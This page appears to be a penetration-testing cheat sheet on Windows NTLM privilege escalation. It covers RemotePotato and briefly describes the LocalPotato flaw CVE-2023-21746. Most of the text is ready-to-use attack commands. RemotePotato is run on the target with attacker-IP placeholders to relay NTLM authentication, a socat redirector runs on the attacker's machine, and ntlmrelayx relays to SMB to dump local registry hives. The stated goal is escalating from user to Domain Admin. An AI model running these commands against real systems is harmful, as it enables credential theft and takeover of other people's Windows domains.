NTLM elevation of privilege

RemotePotato

Windows Privilege Escalation from User to Domain Admin. NTLM Relay

Relay NetNTLMv2 to SMB

Very effective on e.g. terminal server where admin/domain admins are logged on

On the target system:

RemotePotato.exe -m 2 -r <ATTACKER-IP> -x <ATTACKER-IP> -s <SESSION-ID> -c <CLSID DEPENDING ON OS>
  • e.g. CLSID: 5167B42F-C111-47A1-ACC4-8EABE61B0B54

On attacker system:

socat TCP-LISTEN:135,fork,reuseaddr TCP:<TARGET-IP>:9999

Relaying NTLM to SMB to dump local hives on a remote system with local admin privileges

On target system:

RemotePotato0.exe -m 0 -r <ATTACKER-IP> -x <ATTACKER-IP> -p 9999 -s <SESSION-ID> -c <CLSID>
  • e.g. CLSID: F8842F8E-DAFE-4B37-9D38-4E0714A61149

On attacker system:

socat TCP-LISTEN:135,fork,reuseaddr TCP:<TARGET-IP>:9999
ntlmrelayx.py -t <SECOND-TARGET-IP> -smb2support

LocalPotato

CVE-2023-21746, Microsoft Windows could allow a local authenticated attacker to gain elevated privileges on the system, caused by a flaw in the NTLM component. By executing a specially-crafted program, an authenticated attacker could exploit this vulnerability to obtain SYSTEM privileges.

Last updated